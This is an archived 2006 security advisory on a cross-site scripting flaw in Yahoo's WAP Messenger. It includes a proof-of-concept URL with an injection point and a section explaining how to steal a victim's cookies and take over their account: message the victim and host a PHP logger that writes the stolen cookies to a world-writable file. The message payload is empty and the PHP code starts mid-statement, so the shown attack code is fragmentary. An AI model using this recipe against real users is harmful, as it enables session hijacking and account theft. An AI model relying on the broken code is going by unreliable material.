TUCoPS :: HP Unsorted W :: b06-4801.htm

WAP Y! Messenger Cross-Site Scripting Vulnerability
WAP Y! Messenger Cross-Site Scripting Vulnerability
WAP Y! Messenger Cross-Site Scripting Vulnerability


ECHO_ADV_47$2006

------------------------------------------------------------------------------
[ECHO_ADV_47$2006] WAP Y! Messenger Cross-Site Scripting Vulnerability
------------------------------------------------------------------------------

Author          : Dedi Dwianto
Date Found      : Sep, 14th 2006
Location        : Indonesia, Jakarta
web             : http://advisories.echo.or.id/adv/adv47-theday-2006.txt
Critical Lvl    : Medium Critical
Impact          : Cross Site Scripting
Where           : From Remote
---------------------------------------------------------------------------

Affected Yahoo Service description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wireless Application Protocol or WAP is an open international standard for applications thatuse wireless communication.
Its principal application is to enable access to the internet from a mobile phone or PDA.
Yahoo! Have wap site which provide mobile services such as messenger,mail and news via
mobile phone or PDA.

Service         : Y! Messenger
URL             : http://mm.yahoo.com/

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~
Y! Wap messenger allow user can execute the HTML code if message want to save.

Proof Of Concept:
~~~~~~~~~~~~~~~
[1] Open and login with wap browser ,
url : http://mm.yahoo.com
[2] Goto :
http://mm.yahoo.com/xhtml?k=[id]&u=[your_nick]&s=[your session]&m=[your_nick]_dummymin&c=707&p=&d=[your_friend_id]*[your_nick]*[random number]*[XSS HERE]

Attacker Stealting Cookie for get Account :
[1] Send message to victim with connected via mobile/wap .
    message :
    ----begin----
    Hello , please save my message :)

    ----end -----

    ----get_cookie.php----
     IP: ' .$ip. '
 Date and Time: ' .$date. '
 Referer: '.$referer.'



');
        fclose($fp);
    ?>
    ----end -----
    change permission file cookies.txt to 777


Solution:
~~~~~~~
- Don't Save any message with html code :).

---------------------------------------------------------------------------
Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ az001,boom3x,mathdule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~
     EcHo Research & Development Center
     the_day[at]echo[dot]or[dot]id

-------------------------------- [ EOF ]----------------------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH